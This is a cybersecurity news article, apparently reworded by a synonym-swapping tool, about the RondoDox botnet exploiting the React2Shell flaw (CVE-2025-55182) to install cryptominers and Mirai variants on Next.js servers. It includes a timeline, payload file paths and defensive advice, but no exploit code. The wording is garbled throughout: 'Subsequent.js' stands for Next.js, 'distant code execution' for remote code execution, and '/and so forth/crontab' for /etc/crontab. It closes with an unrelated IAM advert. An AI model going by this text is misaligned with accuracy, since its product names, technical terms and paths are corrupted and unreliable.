The RondoDox botnet has been noticed exploiting the important React2Shell flaw (CVE-2025-55182) to contaminate susceptible Subsequent.js servers with malware and cryptominers.
First documented by Fortinet in July 2025, RondoDox is a large-scale botnet that targets a number of n-day flaws in world assaults. In November, VulnCheck noticed new RondoDox variants that featured exploits for CVE-2025-24893, a important distant code execution (RCE) vulnerability within the XWiki Platform.
A brand new report from cybersecurity firm CloudSEK notes that RondoDox began scanning for susceptible Subsequent.js servers on December 8 and commenced deploying botnet purchasers three days later.
React2Shell is an unauthenticated distant code execution vulnerability that may be exploited through a single HTTP request and impacts all frameworks that implement the React Server Parts (RSC) ‘Flight’ protocol, together with Subsequent.js.
The flaw has been leveraged by a number of risk actors to breach a number of organizations. North Korean hackers exploited React2Shell to deploy a brand new malware household named EtherRAT.
As of December 30, the Shadowserver Basis stories detecting over 94,000 internet-exposed belongings susceptible to React2Shell.
CloudSEK says that RondoDox has handed by way of three distinct operational phases this yr:
- Reconnaissance and vulnerability testing from March to April 2025
- Automated net app exploitation from April to June 2025
- Massive-scale IoT botnet deployment from July to right this moment
Concerning React2Shell, the researchers report that RondoDox has targeted its exploitation across the flaw considerably currently, launching over 40 exploit makes an attempt inside six days in December.
Throughout this operational part, the botnet conducts hourly IoT exploitation waves focusing on Linksys, Wavlink, and different shopper and enterprise routers to enroll new bots.
After probing probably susceptible servers, CloudSEK says that RoundDox began to deploy payloads that included a coinminer (/nuts/poop), a botnet loader and well being checker (/nuts/bolts), and a variant of Mirai (/nuts/x86).
The ‘bolts’ element removes competing botnet malware from the host, enforces persistence through /and so forth/crontab, and kills non-whitelisted processes each 45 seconds, the researchers say.
CloudSEK offers a set of suggestions for firms to guard in opposition to this RondoDox exercise, amongst them auditing and patching Subsequent.js Server Actions, isolating IoT gadgets into devoted digital LANs, and monitoring for suspicious processes being executed.
Damaged IAM is not simply an IT drawback – the affect ripples throughout your complete enterprise.
This sensible information covers why conventional IAM practices fail to maintain up with trendy calls for, examples of what “good” IAM seems to be like, and a easy guidelines for constructing a scalable technique.
